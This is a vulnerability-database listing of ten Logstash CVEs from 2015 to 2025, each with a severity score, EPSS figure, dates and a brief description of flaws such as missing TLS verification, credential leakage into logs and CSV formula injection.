Elastic

Logstash

13 vulnerabilities found.

Hinweis: Diese Liste kann unvollständig sein. Daten werden ohne Gewähr im Ursprungsformat bereitgestellt.
6.5

CVE-2025-37730

  • EPSS 0.02%
  • Published 06.05.2025 17:29:07
  • Last modified 07.05.2025 14:13:20

Improper certificate validation in Logstash's TCP output could lead to a man-in-the-middle (MitM) attack in “client” mode, as hostname verification in TCP output was not being performed when the ssl_verification_mode => full was set.

5.5

CVE-2023-46672

  • EPSS 0.15%
  • Published 15.11.2023 08:15:07
  • Last modified 13.02.2025 18:15:36

An issue was identified by Elastic whereby sensitive information is recorded in Logstash logs under specific circumstances. The prerequisites for the manifestation of this issue are: * Logstash is configured to log in JSON format https://www.el...

4.3

CVE-2021-22138

  • EPSS 0.11%
  • Published 13.05.2021 18:15:09
  • Last modified 21.11.2024 05:49:34

In Logstash versions after 6.4.0 and before 6.8.15 and 7.12.0 a TLS certificate validation flaw was found in the monitoring feature. When specifying a trusted server CA certificate Logstash would not properly verify the certificate returned by the mo...

7.5

CVE-2019-7620

  • EPSS 1.41%
  • Published 30.10.2019 14:15:11
  • Last modified 21.11.2024 04:48:25

Logstash versions before 7.4.1 and 6.8.4 contain a denial of service flaw in the Logstash Beats input plugin. An unauthenticated user who is able to connect to the port the Logstash beats input could send a specially crafted network packet that would...

9.8

CVE-2019-7612

  • EPSS 0.48%
  • Published 25.03.2019 19:29:02
  • Last modified 21.11.2024 04:48:24

A sensitive data disclosure flaw was found in the way Logstash versions before 5.6.15 and 6.6.1 logs malformed URLs. If a malformed URL is specified as part of the Logstash configuration, the credentials for the URL could be inadvertently logged as p...

6.5

CVE-2018-3817

  • EPSS 0.31%
  • Published 30.03.2018 20:29:00
  • Last modified 21.11.2024 04:06:05

When logging warnings regarding deprecated settings, Logstash before 5.6.6 and 6.x before 6.1.2 could inadvertently log sensitive information.

5.9

CVE-2015-5619

  • EPSS 0.31%
  • Published 09.08.2017 16:29:00
  • Last modified 20.04.2025 01:37:25

Logstash 1.4.x before 1.4.5 and 1.5.x before 1.5.4 with Lumberjack output or the Logstash forwarder does not validate SSL/TLS certificates from the Logstash server, which might allow attackers to obtain sensitive information via a man-in-the-middle a...

7.5

CVE-2015-5378

  • EPSS 0.98%
  • Published 27.06.2017 20:29:00
  • Last modified 20.04.2025 01:37:25

Logstash 1.5.x before 1.5.3 and 1.4.x before 1.4.4 allows remote attackers to read communications between Logstash Forwarder agent and Logstash server.

7.5

CVE-2016-1000221

  • EPSS 0.75%
  • Published 16.06.2017 21:29:00
  • Last modified 20.04.2025 01:37:25

Logstash prior to version 2.3.4, Elasticsearch Output plugin would log to file HTTP authorization headers which could contain sensitive information.

7.5

CVE-2016-1000222

  • EPSS 0.35%
  • Published 16.06.2017 21:29:00
  • Last modified 20.04.2025 01:37:25

Logstash prior to version 2.1.2, the CSV output can be attacked via engineered input that will create malicious formulas in the CSV data.